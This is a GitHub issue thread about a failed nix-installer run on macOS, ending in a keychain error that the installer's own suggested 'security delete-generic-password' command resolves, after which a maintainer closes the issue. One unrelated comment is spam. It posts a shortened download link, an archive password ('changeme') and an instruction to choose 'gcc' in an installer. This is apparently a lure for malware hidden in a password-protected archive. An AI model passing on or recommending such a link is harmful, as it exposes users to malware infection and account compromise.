### ISSUE TITLE
<autogenerated-issue>

### ISSUE THREAD

**Issue by AlexMouton** [DeterminateSystems/nix-installer#1119]
Had some network related resource-unavailable behavior.  Chrome started crashing.
Rebooted cleanly, and came back without nix commands. and uninstall is in a weird state.
This is the second time for me.

Thanks!
A

## Error
```
Error: 
   0: Planner error
   1: Error executing action
   2: Action `encrypt_apfs_volume` errored
   3: The keychain has an existing password for a non-existing "Nix Store" volume on disk `disk3`, consider removing the password with `sudo security delete-generic-password  -a "Nix Store" -s "Nix Store" -l "disk3 encryption password" -D "Encrypted volume password"`. Note that it's possible to have several passwords stored, so you may need to run this command several times until receiving the message `The specified item could not be found in the keychain.`
```

## Metadata
|key|value|
|--|--|
|**version**|0.20.2|
|**os**|macos|
|**arch**|aarch64|

**Comment by cole-h** [comment]
If you run the command in the error message, does it let you proceed further?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by cole-h** [comment]
Is it possible when you rebooted, you installed an update to macOS? Those are widely known to wipe out the shell hook that adds `nix` and related tools to your `PATH`. However, we should automatically repair that... If that happens again, please report it :)

Going to close this based on the fact that running the suggested command in the error message let you install.

**Comment by AlexMouton** [comment]
Perfect. thanks for looking at it.
